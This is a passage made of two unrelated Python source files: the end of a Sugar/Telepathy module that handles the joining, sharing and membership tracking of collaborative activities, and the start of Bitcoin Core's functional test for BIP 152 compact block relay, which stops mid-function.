self.notify('color')
val = bool(new_props.get('private', self._private))
if val != self._private:
self._private = val
self.notify('private')
val = new_props.get('id', self._id)
if isinstance(val, str) and self._id is None:
self._id = val
self.notify('id')
val = new_props.get('type', self._type)
if isinstance(val, str) and self._type is None:
self._type = val
self.notify('type')
def object_path(self):
"""Get our dbus object path"""
return self._object_path
def do_get_property(self, pspec):
"""Retrieve a particular property from our property dictionary"""
if pspec.name == 'joined':
return self._joined
if self._get_properties_call is not None:
_logger.debug('%r: Blocking on GetProperties() because someone '
'wants property %s' % (self, pspec.name))
self._get_properties_call.block()
if pspec.name == 'id':
return self._id
elif pspec.name == 'name':
return self._name
elif pspec.name == 'color':
return self._color
elif pspec.name == 'type':
return self._type
elif pspec.name == 'tags':
return self._tags
elif pspec.name == 'private':
return self._private
def do_set_property(self, pspec, val):
"""Set a particular property in our property dictionary"""
# FIXME: need an asynchronous API to set these properties,
# particularly 'private'
if pspec.name == 'name':
self._name = val
elif pspec.name == 'color':
self._color = val
elif pspec.name == 'tags':
self._tags = val
elif pspec.name == 'private':
self._private = val
else:
raise ValueError('Unknown property %r' % pspec.name)
self._publish_properties()
def set_private(self, val, reply_handler, error_handler):
_logger.debug('set_private %r' % val)
self._activity.SetProperties({'private': bool(val)},
reply_handler=reply_handler,
error_handler=error_handler)
def get_joined_buddies(self):
"""Retrieve the set of Buddy objects attached to this activity
returns list of presence Buddy objects that we can successfully
create from the buddy object paths that PS has for this activity.
"""
return self._joined_buddies.values()
def get_buddy_by_handle(self, handle):
"""Retrieve the Buddy object given a telepathy handle.
buddy object paths are cached in self._handle_to_buddy_path,
so we can get the buddy without calling PS.
"""
object_path = self._handle_to_buddy_path.get(handle, None)
if object_path:
buddy = self._ps_new_object(object_path)
return buddy
return None
def invite(self, buddy, message, response_cb):
"""Invite the given buddy to join this activity.
The callback will be called with one parameter: None on success,
or an exception on failure.
"""
if not self._joined:
raise RuntimeError('Cannot invite a buddy to an activity that is'
'not shared.')
self.telepathy_text_chan.AddMembers(
[buddy.contact_handle], message,
dbus_interface=CHANNEL_INTERFACE_GROUP,
reply_handler=partial(
self.__invite_cb, response_cb),
error_handler=partial(self.__invite_cb, response_cb))
def __invite_cb(self, response_cb, error=None):
response_cb(error)
def set_up_tubes(self, reply_handler, error_handler):
raise NotImplementedError()
def __joined_cb(self, join_command, error):
_logger.debug('%r: Join finished %r' % (self, error))
if error is not None:
self.emit('joined', error is None, str(error))
self.telepathy_text_chan = join_command.text_channel
self.telepathy_tubes_chan = join_command.tubes_channel
self._channel_self_handle = join_command.channel_self_handle
self._text_channel_group_flags = join_command.text_channel_group_flags
self._start_tracking_buddies()
self._start_tracking_channel()
def _start_tracking_buddies(self):
group = self.telepathy_text_chan[CHANNEL_INTERFACE_GROUP]
group.GetAllMembers(reply_handler=self.__get_all_members_cb,
error_handler=self.__error_handler_cb)
group.connect_to_signal('MembersChanged',
self.__text_channel_members_changed_cb)
def _start_tracking_channel(self):
channel = self.telepathy_text_chan[CHANNEL]
channel.connect_to_signal('Closed', self.__text_channel_closed_cb)
def __get_all_members_cb(self, members, local_pending, remote_pending):
_logger.debug('__get_all_members_cb %r %r' % (members,
self._text_channel_group_flags))
if self._channel_self_handle in members:
members.remove(self._channel_self_handle)
if not members:
return
self._resolve_handles(members, reply_cb=self._add_initial_buddies)
def _resolve_handles(self, input_handles, reply_cb):
def get_handle_owners_cb(handles):
self.telepathy_conn.InspectHandles(
HANDLE_TYPE_CONTACT, handles,
reply_handler=reply_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
if self._text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
group = self.telepathy_text_chan[CHANNEL_INTERFACE_GROUP]
group.GetHandleOwners(input_handles,
reply_handler=get_handle_owners_cb,
error_handler=self.__error_handler_cb)
else:
get_handle_owners_cb(input_handles)
def _add_initial_buddies(self, contact_ids):
_logger.debug('__add_initial_buddies %r' % contact_ids)
for contact_id in contact_ids:
self._buddies[contact_id] = self._get_buddy(contact_id)
self._joined_buddies[contact_id] = self._get_buddy(contact_id)
# Once we have the initial members, we can finish the join process
self._joined = True
self.emit('joined', True, None)
def __text_channel_members_changed_cb(self, message, added, removed,
local_pending, remote_pending,
actor, reason):
_logger.debug('__text_channel_members_changed_cb %r' %
[added, message, added, removed, local_pending,
remote_pending, actor, reason])
if self._channel_self_handle in added:
added.remove(self._channel_self_handle)
if added:
self._resolve_handles(added, reply_cb=self._add_buddies)
if self._channel_self_handle in removed:
removed.remove(self._channel_self_handle)
if removed:
self._resolve_handles(removed, reply_cb=self._remove_buddies)
def _add_buddies(self, contact_ids):
for contact_id in contact_ids:
if contact_id not in self._buddies:
buddy = self._get_buddy(contact_id)
self.emit('buddy-joined', buddy)
self._buddies[contact_id] = buddy
if contact_id not in self._joined_buddies:
self._joined_buddies[contact_id] = buddy
def _remove_buddies(self, contact_ids):
for contact_id in contact_ids:
if contact_id in self._buddies:
buddy = self._get_buddy(contact_id)
self.emit('buddy-left', buddy)
del self._buddies[contact_id]
def _get_buddy(self, contact_id):
if contact_id in self._buddies:
return self._buddies[contact_id]
else:
return Buddy(self._account_path, contact_id)
def join(self):
"""Join this activity.
Emits 'joined' and otherwise does nothing if we're already joined.
"""
if self._join_command is not None:
return
if self._joined:
self.emit('joined', True, None)
return
_logger.debug('%r: joining' % self)
self._join_command = _JoinCommand(self.telepathy_conn,
self.room_handle)
self._join_command.connect('finished', self.__joined_cb)
self._join_command.run()
def share(self, share_activity_cb, share_activity_error_cb):
if self.room_handle is not None:
raise ValueError('Already have a room handle')
self._share_command = _ShareCommand(self.telepathy_conn, self._id)
self._share_command.connect('finished',
partial(self.__shared_cb,
share_activity_cb,
share_activity_error_cb))
self._share_command.run()
def __shared_cb(self, share_activity_cb, share_activity_error_cb,
share_command, error):
_logger.debug('%r: Share finished %r' % (self, error))
if error is None:
self._joined = True
self.room_handle = share_command.room_handle
self.telepathy_text_chan = share_command.text_channel
self.telepathy_tubes_chan = share_command.tubes_channel
self._channel_self_handle = share_command.channel_self_handle
self._text_channel_group_flags = \
share_command.text_channel_group_flags
self._publish_properties()
self._start_tracking_properties()
self._start_tracking_buddies()
self._start_tracking_channel()
share_activity_cb(self)
else:
share_activity_error_cb(self, error)
def _publish_properties(self):
properties = {}
if self._color is not None:
properties['color'] = str(self._color)
if self._name is not None:
properties['name'] = str(self._name)
if self._type is not None:
properties['type'] = self._type
if self._tags is not None:
properties['tags'] = self._tags
properties['private'] = self._private
self.telepathy_conn.SetProperties(
self.room_handle,
properties,
dbus_interface=CONN_INTERFACE_ACTIVITY_PROPERTIES)
def __share_error_cb(self, share_activity_error_cb, error):
logging.debug('%r: Share failed because: %s' % (self, error))
share_activity_error_cb(self, error)
# GetChannels() wrapper
def get_channels(self):
"""Retrieve communications channel descriptions for the activity
Returns a tuple containing:
- the D-Bus well-known service name of the connection
(FIXME: this is redundant; in Telepathy it can be derived
from that of the connection)
- the D-Bus object path of the connection
- a list of D-Bus object paths representing the channels
associated with this activity
"""
bus_name = self.telepathy_conn.requested_bus_name
connection_path = self.telepathy_conn.object_path
channels = [self.telepathy_text_chan.object_path,
self.telepathy_tubes_chan.object_path]
_logger.debug('%r: bus name is %s, connection is %s, channels are %r' %
(self, bus_name, connection_path, channels))
return bus_name, connection_path, channels
# Leaving
def __text_channel_closed_cb(self):
self._joined = False
self.emit('joined', False, 'left activity')
def leave(self):
"""Leave this shared activity"""
_logger.debug('%r: leaving' % self)
self.telepathy_text_chan.Close()
class _BaseCommand(GObject.GObject):
__gsignals__ = {
'finished': (GObject.SignalFlags.RUN_FIRST, None,
([object])),
}
def __init__(self):
GObject.GObject.__init__(self)
self.text_channel = None
self.text_channel_group_flags = None
self.tubes_channel = None
self.room_handle = None
self.channel_self_handle = None
def run(self):
raise NotImplementedError()
class _ShareCommand(_BaseCommand):
def __init__(self, connection, activity_id):
_BaseCommand.__init__(self)
self._connection = connection
self._activity_id = activity_id
self._finished = False
self._join_command = None
def run(self):
self._connection.RequestHandles(
HANDLE_TYPE_ROOM,
[self._activity_id],
reply_handler=self.__got_handles_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
def __got_handles_cb(self, handles):
logging.debug('__got_handles_cb %r' % handles)
self.room_handle = handles[0]
self._join_command = _JoinCommand(self._connection, self.room_handle)
self._join_command.connect('finished', self.__joined_cb)
self._join_command.run()
def __joined_cb(self, join_command, error):
_logger.debug('%r: Join finished %r' % (self, error))
if error is not None:
self._finished = True
self.emit('finished', error)
return
self.text_channel = join_command.text_channel
self.text_channel_group_flags = join_command.text_channel_group_flags
self.tubes_channel = join_command.tubes_channel
self.channel_self_handle = join_command.channel_self_handle
self._connection.AddActivity(
self._activity_id,
self.room_handle,
reply_handler=self.__added_activity_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONN_INTERFACE_BUDDY_INFO)
def __added_activity_cb(self):
self._finished = True
self.emit('finished', None)
def __error_handler_cb(self, error):
self._finished = True
self.emit('finished', error)
class _JoinCommand(_BaseCommand):
def __init__(self, connection, room_handle):
_BaseCommand.__init__(self)
self._connection = connection
self._finished = False
self.room_handle = room_handle
self._global_self_handle = None
def run(self):
if self._finished:
raise RuntimeError('This command has already finished')
self._connection.Get(CONNECTION, 'SelfHandle',
reply_handler=self.__get_self_handle_cb,
error_handler=self.__error_handler_cb,
dbus_interface=PROPERTIES_IFACE)
def __get_self_handle_cb(self, handle):
self._global_self_handle = handle
self._connection.RequestChannel(
CHANNEL_TYPE_TEXT,
HANDLE_TYPE_ROOM,
self.room_handle, True,
reply_handler=self.__create_text_channel_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
self._connection.RequestChannel(
CHANNEL_TYPE_TUBES,
HANDLE_TYPE_ROOM,
self.room_handle,
True,
reply_handler=self.__create_tubes_channel_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
def __create_text_channel_cb(self, channel_path):
Channel(self._connection.requested_bus_name, channel_path,
ready_handler=self.__text_channel_ready_cb)
def __create_tubes_channel_cb(self, channel_path):
Channel(self._connection.requested_bus_name, channel_path,
ready_handler=self.__tubes_channel_ready_cb)
def __error_handler_cb(self, error):
self._finished = True
self.emit('finished', error)
def __tubes_channel_ready_cb(self, channel):
_logger.debug('%r: Tubes channel %r is ready' % (self, channel))
self.tubes_channel = channel
self._tubes_ready()
def __text_channel_ready_cb(self, channel):
_logger.debug('%r: Text channel %r is ready' % (self, channel))
self.text_channel = channel
self._tubes_ready()
def _tubes_ready(self):
if self.text_channel is None or \
self.tubes_channel is None:
return
_logger.debug('%r: finished setting up tubes' % self)
self._add_self_to_channel()
def __text_channel_group_flags_changed_cb(self, added, removed):
_logger.debug('__text_channel_group_flags_changed_cb %r %r' % (added,
removed))
self.text_channel_group_flags |= added
self.text_channel_group_flags &= ~removed
def _add_self_to_channel(self):
# FIXME: cope with non-Group channels here if we want to support
# non-OLPC-compatible IMs
group = self.text_channel[CHANNEL_INTERFACE_GROUP]
def got_all_members(members, local_pending, remote_pending):
_logger.debug('got_all_members members %r local_pending %r '
'remote_pending %r' % (members, local_pending,
remote_pending))
if self.text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
self_handle = self.channel_self_handle
else:
self_handle = self._global_self_handle
if self_handle in local_pending:
_logger.debug('%r: We are in local pending - entering' % self)
group.AddMembers([self_handle], '',
reply_handler=lambda: None,
error_handler=lambda e: self._join_failed_cb(
e, 'got_all_members AddMembers'))
if members:
self.__text_channel_members_changed_cb('', members, (),
(), (), 0, 0)
def got_group_flags(flags):
self.text_channel_group_flags = flags
# by the time we hook this, we need to know the group flags
group.connect_to_signal('MembersChanged',
self.__text_channel_members_changed_cb)
# bootstrap by getting the current state. This is where we find
# out whether anyone was lying to us in their PEP info
group.GetAllMembers(reply_handler=got_all_members,
error_handler=self.__error_handler_cb)
def got_self_handle(channel_self_handle):
self.channel_self_handle = channel_self_handle
group.connect_to_signal('GroupFlagsChanged',
self.__text_channel_group_flags_changed_cb)
group.GetGroupFlags(reply_handler=got_group_flags,
error_handler=self.__error_handler_cb)
group.GetSelfHandle(reply_handler=got_self_handle,
error_handler=self.__error_handler_cb)
def __text_channel_members_changed_cb(self, message, added, removed,
local_pending, remote_pending,
actor, reason):
_logger.debug('__text_channel_members_changed_cb added %r removed %r '
'local_pending %r remote_pending %r channel_self_handle '
'%r' % (added, removed, local_pending, remote_pending,
self.channel_self_handle))
if self.text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
self_handle = self.channel_self_handle
else:
self_handle = self._global_self_handle
if self_handle not in added:
return
# Use RoomConfig1 to configure the text channel. If this
# doesn't exist, fall-back on old-style PROPERTIES_INTERFACE.
if CONN_INTERFACE_ROOM_CONFIG in self.text_channel:
self.__update_room_config()
elif PROPERTIES_INTERFACE in self.text_channel:
self.text_channel[PROPERTIES_INTERFACE].ListProperties(
reply_handler=self.__list_properties_cb,
error_handler=self.__error_handler_cb)
else:
# FIXME: when does this codepath get hit?
# It could be related to no property configuration being available
# in the selected backend, or it could be called at some stage
# of the protocol when properties aren't available yet.
self._finished = True
self.emit('finished', None)
def __update_room_config(self):
# FIXME: invite-only ought to be set on private activities; but
# since only the owner can change invite-only, that would break
# activity scope changes.
props = {
# otherwise buddy resolution breaks
'Anonymous': False,
# anyone who knows about the channel can join
'InviteOnly': False,
# vanish when there are no members
'Persistent': False,
# don't appear in server room lists
'Private': True,
}
room_cfg = self.text_channel[CONN_INTERFACE_ROOM_CONFIG]
room_cfg.UpdateConfiguration(props,
reply_handler=self.__room_cfg_updated_cb,
error_handler=self.__room_cfg_error_cb)
def __room_cfg_updated_cb(self):
self._finished = True
self.emit('finished', None)
def __room_cfg_error_cb(self, error):
# If RoomConfig update fails, it's probably because we don't have
# permission (e.g. we are not the session initiator). Thats OK -
# ignore the failure and carry on.
if (error.get_dbus_name() !=
'org.freedesktop.Telepathy.Error.PermissionDenied'):
logging.error("Error setting room configuration: %s", error)
self._finished = True
self.emit('finished', None)
def __list_properties_cb(self, prop_specs):
# FIXME: invite-only ought to be set on private activities; but
# since only the owner can change invite-only, that would break
# activity scope changes.
props = {
# otherwise buddy resolution breaks
'anonymous': False,
# anyone who knows about the channel can join
'invite-only': False,
# so non-owners can invite others
'invite-restricted': False,
# vanish when there are no members
'persistent': False,
# don't appear in server room lists
'private': True,
}
props_to_set = []
for ident, name, sig_, flags in prop_specs:
value = props.pop(name, None)
if value is not None:
if flags & PROPERTY_FLAG_WRITE:
props_to_set.append((ident, value))
# FIXME: else error, but only if we're creating the room?
# FIXME: if props is nonempty, then we want to set props that aren't
# supported here - raise an error?
if props_to_set:
self.text_channel[PROPERTIES_INTERFACE].SetProperties(
props_to_set, reply_handler=self.__set_properties_cb,
error_handler=self.__error_handler_cb)
else:
self._finished = True
self.emit('finished', None)
def __set_properties_cb(self):
self._finished = True
self.emit('finished', None)
|
gmaxwell/bitcoin | refs/heads/master | test/functional/p2p-compactblocks.py | 7 | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test compact blocks (BIP 152).
Version 1 compact blocks are pre-segwit (txids)
Version 2 compact blocks are post-segwit (wtxids)
"""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment
from test_framework.script import CScript, OP_TRUE
# TestNode: A peer we use to send messages to bitcoind, and store responses.
class TestNode(NodeConnCB):
def __init__(self):
super().__init__()
self.last_sendcmpct = []
self.block_announced = False
# Store the hashes of blocks we've seen announced.
# This is for synchronizing the p2p message traffic,
# so we can eg wait until a particular block is announced.
self.announced_blockhashes = set()
def on_sendcmpct(self, conn, message):
self.last_sendcmpct.append(message)
def on_cmpctblock(self, conn, message):
self.block_announced = True
self.last_message["cmpctblock"].header_and_shortids.header.calc_sha256()
self.announced_blockhashes.add(self.last_message["cmpctblock"].header_and_shortids.header.sha256)
def on_headers(self, conn, message):
self.block_announced = True
for x in self.last_message["headers"].headers:
x.calc_sha256()
self.announced_blockhashes.add(x.sha256)
def on_inv(self, conn, message):
for x in self.last_message["inv"].inv:
if x.type == 2:
self.block_announced = True
self.announced_blockhashes.add(x.hash)
# Requires caller to hold mininode_lock
def received_block_announcement(self):
return self.block_announced
def clear_block_announcement(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.last_message.pop("cmpctblock", None)
def get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.connection.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def request_headers_and_sync(self, locator, hashstop=0):
self.clear_block_announcement()
self.get_headers(locator, hashstop)
wait_until(self.received_block_announcement, timeout=30, lock=mininode_lock)
self.clear_block_announcement()
# Block until a block announcement for a particular block hash is
# received.
def wait_for_block_announcement(self, block_hash, timeout=30):
def received_hash():
return (block_hash in self.announced_blockhashes)
wait_until(received_hash, timeout=timeout, lock=mininode_lock)
def send_await_disconnect(self, message, timeout=30):
"""Sends a message to the node and wait for disconnect.
This is used when we want to send a message into the node that we expect
will get us disconnected, eg an invalid block."""
self.send_message(message)
wait_until(lambda: not self.connected, timeout=timeout, lock=mininode_lock)
class CompactBlocksTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
# Node0 = pre-segwit, node1 = segwit-aware
self.num_nodes = 2
self.extra_args = [["-vbparams=segwit:0:0"], ["-txindex"]]
self.utxos = []
def build_block_on_tip(self, node, segwit=False):
height = node.getblockcount()
tip = node.getbestblockhash()
mtp = node.getblockheader(tip)['mediantime']
block = create_block(int(tip, 16), create_coinbase(height + 1), mtp + 1)
block.nVersion = 4
if segwit:
add_witness_commitment(block)
block.solve()
return block
# Create 10 more anyone-can-spend utxo's for testing.
def make_utxos(self):
# Doesn't matter which node we use, just use node0.
block = self.build_block_on_tip(self.nodes[0])
self.test_node.send_and_ping(msg_block(block))
assert(int(self.nodes[0].getbestblockhash(), 16) == block.sha256)
self.nodes[0].generate(100)
total_value = block.vtx[0].vout[0].nValue
out_value = total_value // 10
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(block.vtx[0].sha256, 0), b''))
for i in range(10):
tx.vout.append(CTxOut(out_value, CScript([OP_TRUE])))
tx.rehash()
block2 = self.build_block_on_tip(self.nodes[0])
block2.vtx.append(tx)
block2.hashMerkleRoot = block2.calc_merkle_root()
block2.solve()
self.test_node.send_and_ping(msg_block(block2))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block2.sha256)
self.utxos.extend([[tx.sha256, i, out_value] for i in range(10)])
return
# Test "sendcmpct" (between peers preferring the same version):
# - No compact block announcements unless sendcmpct is sent.
# - If sendcmpct is sent with version > preferred_version, the message is ignored.
# - If sendcmpct is sent with boolean 0, then block announcements are not
# made with compact blocks.
# - If sendcmpct is then sent with boolean 1, then new block announcements
# are made with compact blocks.
# If old_node is passed in, request compact blocks with version=preferred-1
# and verify that it receives block announcements via compact block.
def test_sendcmpct(self, node, test_node, preferred_version, old_node=None):
# Make sure we get a SENDCMPCT message from our peer
def received_sendcmpct():
return (len(test_node.last_sendcmpct) > 0)
wait_until(received_sendcmpct, timeout=30, lock=mininode_lock)
with mininode_lock:
# Check that the first version received is the preferred one
assert_equal(test_node.last_sendcmpct[0].version, preferred_version)
# And that we receive versions down to 1.
assert_equal(test_node.last_sendcmpct[-1].version, 1)
test_node.last_sendcmpct = []
tip = int(node.getbestblockhash(), 16)
def check_announcement_of_new_block(node, peer, predicate):
peer.clear_block_announcement()
block_hash = int(node.generate(1)[0], 16)
peer.wait_for_block_announcement(block_hash, timeout=30)
assert(peer.block_announced)
with mininode_lock:
assert predicate(peer), (
"block_hash={!r}, cmpctblock={!r}, inv={!r}".format(
block_hash, peer.last_message.get("cmpctblock", None), peer.last_message.get("inv", None)))
# We shouldn't get any block announcements via cmpctblock yet.
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Try one more time, this time after requesting headers.
test_node.request_headers_and_sync(locator=[tip])
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message and "inv" in p.last_message)
# Test a few ways of using sendcmpct that should NOT
# result in compact block announcements.
# Before each test, sync the headers chain.
test_node.request_headers_and_sync(locator=[tip])
# Now try a SENDCMPCT message with too-high version
sendcmpct = msg_sendcmpct()
sendcmpct.version = preferred_version+1
sendcmpct.announce = True
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Headers sync before next test.
test_node.request_headers_and_sync(locator=[tip])
# Now try a SENDCMPCT message with valid version, but announce=False
sendcmpct.version = preferred_version
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Headers sync before next test.
test_node.request_headers_and_sync(locator=[tip])
# Finally, try a SENDCMPCT message with announce=True
sendcmpct.version = preferred_version
sendcmpct.announce = True
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time (no headers sync should be needed!)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time, after turning on sendheaders
test_node.send_and_ping(msg_sendheaders())
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time, after sending a version-1, announce=false message.
sendcmpct.version = preferred_version-1
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Now turn off announcements
sendcmpct.version = preferred_version
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message and "headers" in p.last_message)
if old_node is not None:
# Verify that a peer using an older protocol version can receive
# announcements from this node.
sendcmpct.version = preferred_version-1
sendcmpct.announce = True
old_node.send_and_ping(sendcmpct)
# Header sync
old_node.request_headers_and_sync(locator=[tip])
check_announcement_of_new_block(node, old_node, lambda p: "cmpctblock" in p.last_message)
# This test actually causes bitcoind to (reasonably!) disconnect us, so do this last.
def test_invalid_cmpctblock_message(self):
self.nodes[0].generate(101)
block = self.build_block_on_tip(self.nodes[0])
cmpct_block = P2PHeaderAndShortIDs()
cmpct_block.header = CBlockHeader(block)
cmpct_block.prefilled_txn_length = 1
# This index will be too high
prefilled_txn = PrefilledTransaction(1, block.vtx[0])
cmpct_block.prefilled_txn = [prefilled_txn]
self.test_node.send_await_disconnect(msg_cmpctblock(cmpct_block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.hashPrevBlock)
# Compare the generated shortids to what we expect based on BIP 152, given
# bitcoind's choice of nonce.
def test_compactblock_construction(self, node, test_node, version, use_witness_address):
# Generate a bunch of transactions.
node.generate(101)
num_transactions = 25
address = node.getnewaddress()
if use_witness_address:
# Want at least one segwit spend, so move all funds to
# a witness address.
address = node.addwitnessaddress(address)
value_to_send = node.getbalance()
node.sendtoaddress(address, satoshi_round(value_to_send-Decimal(0.1)))
node.generate(1)
segwit_tx_generated = False
for i in range(num_transactions):
txid = node.sendtoaddress(address, 0.1)
hex_tx = node.gettransaction(txid)["hex"]
tx = FromHex(CTransaction(), hex_tx)
if not tx.wit.is_null():
segwit_tx_generated = True
if use_witness_address:
assert(segwit_tx_generated) # check that our test is not broken
# Wait until we've seen the block announcement for the resulting tip
tip = int(node.getbestblockhash(), 16)
test_node.wait_for_block_announcement(tip)
# Make sure we will receive a fast-announce compact block
self.request_cb_announcements(test_node, node, version)
# Now mine a block, and look at the resulting compact block.
test_node.clear_block_announcement()
block_hash = int(node.generate(1)[0], 16)
# Store the raw block in our internal format.
block = FromHex(CBlock(), node.getblock("%02x" % block_hash, False))
for tx in block.vtx:
tx.calc_sha256()
block.rehash()
# Wait until the block was announced (via compact blocks)
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
# Now fetch and check the compact block
header_and_shortids = None
with mininode_lock:
assert("cmpctblock" in test_node.last_message)
# Convert the on-the-wire representation to absolute indexes
header_and_shortids = HeaderAndShortIDs(test_node.last_message["cmpctblock"].header_and_shortids)
self.check_compactblock_construction_from_block(version, header_and_shortids, block_hash, block)
# Now fetch the compact block using a normal non-announce getdata
with mininode_lock:
test_node.clear_block_announcement()
inv = CInv(4, block_hash) # 4 == "CompactBlock"
test_node.send_message(msg_getdata([inv]))
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
# Now fetch and check the compact block
header_and_shortids = None
with mininode_lock:
assert("cmpctblock" in test_node.last_message)
# Convert the on-the-wire representation to absolute indexes
header_and_shortids = HeaderAndShortIDs(test_node.last_message["cmpctblock"].header_and_shortids)
self.check_compactblock_construction_from_block(version, header_and_shortids, block_hash, block)
def check_compactblock_construction_from_block(self, version, header_and_shortids, block_hash, block):
# Check that we got the right block!
header_and_shortids.header.calc_sha256()
assert_equal(header_and_shortids.header.sha256, block_hash)
# Make sure the prefilled_txn appears to have included the coinbase
assert(len(header_and_shortids.prefilled_txn) >= 1)
assert_equal(header_and_shortids.prefilled_txn[0].index, 0)
# Check that all prefilled_txn entries match what's in the block.
for entry in header_and_shortids.prefilled_txn:
entry.tx.calc_sha256()
# This checks the non-witness parts of the tx agree
assert_equal(entry.tx.sha256, block.vtx[entry.index].sha256)
# And this checks the witness
wtxid = entry.tx.calc_sha256(True)
if version == 2:
assert_equal(wtxid, block.vtx[entry.index].calc_sha256(True))
else:
# Shouldn't have received a witness
assert(entry.tx.wit.is_null())
# Check that the cmpctblock message announced all the transactions.
assert_equal(len(header_and_shortids.prefilled_txn) + len(header_and_shortids.shortids), len(block.vtx))
# And now check that all the shortids are as expected as well.
# Determine the siphash keys to use.
[k0, k1] = header_and_shortids.get_siphash_keys()
index = 0
while index < len(block.vtx):
if (len(header_and_shortids.prefilled_txn) > 0 and
header_and_shortids.prefilled_txn[0].index == index):
# Already checked prefilled transactions above
header_and_shortids.prefilled_txn.pop(0)
else:
tx_hash = block.vtx[index].sha256
if version == 2:
tx_hash = block.vtx[index].calc_sha256(True)
shortid = calculate_shortid(k0, k1, tx_hash)
assert_equal(shortid, header_and_shortids.shortids[0])
header_and_shortids.shortids.pop(0)
index += 1
# Test that bitcoind requests compact blocks when we announce new blocks
# via header or inv, and that responding to getblocktxn causes the block
# to be successfully reconstructed.
# Post-segwit: upgraded nodes would only make this request of cb-version-2,
# NODE_WITNESS peers. Unupgraded nodes would still make this request of
# any cb-version-1-supporting peer.
def test_compactblock_requests(self, node, test_node, version, segwit):
# Try announcing a block with an inv or header, expect a compactblock
# request
for announce in ["inv", "header"]:
block = self.build_block_on_tip(node, segwit=segwit)
with mininode_lock:
test_node.last_message.pop("getdata", None)
if announce == "inv":
test_node.send_message(msg_inv([CInv(2, block.sha256)]))
wait_until(lambda: "getheaders" in test_node.last_message, timeout=30, lock=mininode_lock)
test_node.send_header_for_blocks([block])
else:
test_node.send_header_for_blocks([block])
wait_until(lambda: "getdata" in test_node.last_message, timeout=30, lock=mininode_lock)
assert_equal(len(test_node.last_message["getdata"].inv), 1)
assert_equal(test_node.last_message["getdata"].inv[0].type, 4)
assert_equal(test_node.last_message["getdata"].inv[0].hash, block.sha256)
# Send back a compactblock message that omits the coinbase
comp_block = HeaderAndShortIDs()
comp_block.header = CBlockHeader(block)
comp_block.nonce = 0
[k0, k1] = comp_block.get_siphash_keys()
coinbase_hash = block.vtx[0].sha256
if version == 2:
coinbase_hash = block.vtx[0].calc_sha256(True)
comp_block.shortids = [
calculate_shortid(k0, k1, coinbase_hash) ]
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
assert_equal(int(node.getbestblockhash(), 16), block.hashPrevBlock)
# Expect a getblocktxn message.
with mininode_lock:
assert("getblocktxn" in test_node.last_message)
absolute_indexes = test_node.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, [0]) # should be a coinbase request
# Send the coinbase, and verify that the tip advances.
if version == 2:
msg = msg_witness_blocktxn()
else:
msg = msg_blocktxn()
msg.block_transactions.blockhash = block.sha256
msg.block_transactions.transactions = [block.vtx[0]]
test_node.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
# Create a chain of transactions from given utxo, and add to a new block.
def build_block_with_transactions(self, node, utxo, num_transactions):
block = self.build_block_on_tip(node)
for i in range(num_transactions):
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(utxo[0], utxo[1]), b''))
tx.vout.append(CTxOut(utxo[2] - 1000, CScript([OP_TRUE])))
tx.rehash()
utxo = [tx.sha256, 0, tx.vout[0].nValue]
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
return block
# Test that we only receive getblocktxn requests for transactions that the
# node needs, and that responding to them causes the block to be
# reconstructed.
def test_getblocktxn_requests(self, node, test_node, version):
with_witness = (version==2)
def test_getblocktxn_response(compact_block, peer, expected_result):
msg = msg_cmpctblock(compact_block.to_p2p())
peer.send_and_ping(msg)
with mininode_lock:
assert("getblocktxn" in peer.last_message)
absolute_indexes = peer.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, expected_result)
def test_tip_after_message(node, peer, msg, tip):
peer.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), tip)
# First try announcing compactblocks that won't reconstruct, and verify
